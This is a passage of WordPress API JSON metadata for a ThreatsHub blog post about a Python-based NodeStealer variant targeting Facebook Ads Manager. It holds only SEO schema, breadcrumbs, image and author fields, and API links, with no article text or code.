Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Python-Based NodeStealer Version Targets Facebook Ads Manager\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 
Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","og_locale":"en_US","og_type":"article","og_title":"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-12-19T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. 
reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Python-Based NodeStealer Version Targets Facebook Ads Manager","datePublished":"2024-12-19T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/"},"wordCount":1943,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Malware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","url":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","name":"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity 
News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80","datePublished":"2024-12-19T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Python-Based NodeStealer Version Targets Facebook Ads 
Manager"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a867
1ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57888","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57888"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57888\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57888"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57888"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57888"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}